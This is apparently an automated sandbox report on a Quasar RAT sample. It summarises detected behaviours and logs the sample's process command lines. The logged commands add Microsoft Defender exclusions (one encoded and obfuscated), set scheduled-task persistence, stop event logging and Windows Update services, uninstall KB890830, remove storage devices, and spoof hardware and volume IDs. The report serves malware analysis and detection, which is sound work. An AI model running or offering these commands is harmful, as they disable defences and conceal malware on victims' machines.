Analysis Overview
SHA256: 01e185ad6cba8440d1fa1d5c5ea5802d346ae7fabbe1c57115e4135b84420a7f
Threat Level: Known bad
The file 0c0dc0cf41e3c993ae5a22803275949abin.zip was found to be: Known bad.
Malicious Activity Summary
Quasar payload
Quasar RAT
Process spawned unexpected child process
Nirsoft
Creates new service(s)
Stops running service(s)
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Unsigned PE
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-01-05 11:47
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted: 2024-01-05 11:46
Reported: 2024-01-05 11:49
Platform: win7-20231215-en
Max time kernel: 0s
Max time network: 147s
Signatures
Quasar RAT
Quasar payload
Nirsoft
Creates new service(s)
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2380 wrote to memory of 1204 | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe
"C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: NZME-9H4D
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe'" /f
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\s3KUFe101b.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\System.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Sync Framework\wininit.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Google\conhost.exe'
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Windows\TAPI\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\TAPI\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Windows\TAPI\System.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Google\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Google\conhost.exe'" /f
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: NZME-9H4D
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="
(The -EncodedCommand argument is base64 of UTF-16LE text and decodes to Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, with filler PowerShell block comments <#xcg#>, <#bmm#>, <#emq#> and <#xex#> inserted between the tokens; it is the same Defender-exclusion step as the plain-text powershell.exe entries in this list.)
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe
"C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe"
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728449HP-TRGT32560MST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328445HP-TRGT21812DQ
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628445HP-TRGT21812FU
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428445HP-TRGT21812FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528445HP-TRGT21812SL
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828445HP-TRGT21812SG
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228445HP-TRGT21812RV
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28445HP-TRGT21812AB
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728465HP-TRGT20767MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628465HP-TRGT20767FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328465HP-TRGT20767DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528465HP-TRGT20767SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428465HP-TRGT20767FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828465HP-TRGT20767SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228465HP-TRGT20767RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "driverupdate"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328481HP-TRGT8973DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728481HP-TRGT8973MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628481HP-TRGT8973FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528481HP-TRGT8973SL
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428481HP-TRGT8973FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828481HP-TRGT8973SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228481HP-TRGT8973RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28481HP-TRGT8973AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "driverupdate"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28465HP-TRGT20767AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 9V2B-R0ZF
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 9V2B-R0ZF
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: TUI8-L1C8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: TUI8-L1C8
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: G82R-D9F0
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: G82R-D9F0
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: PIP3-VJPS
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: PIP3-VJPS
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: F7M2-8LDT
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: F7M2-8LDT
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: Z4KU-N2GK
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: Z4KU-N2GK
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: SME3-DE0M
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: SME3-DE0M
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3V13-NN1U
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3V13-NN1U
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: GT39-ME29
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: GT39-ME29
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 9UN0-L18O
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 9UN0-L18O
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: F5MT-E1VR
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: F5MT-E1VR
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: M4I8-GMHJ
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: M4I8-GMHJ
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 4NL2-IHDE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 4NL2-IHDE
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: E7H3-L20O
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: E7H3-L20O
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 5ODZ-8IZ1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 5ODZ-8IZ1
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: B319-ZT36
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: B319-ZT36
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: E7F9-L7C9
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: E7F9-L7C9
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 45NC-UMFA
C:\Windows\System32\cmd.exe
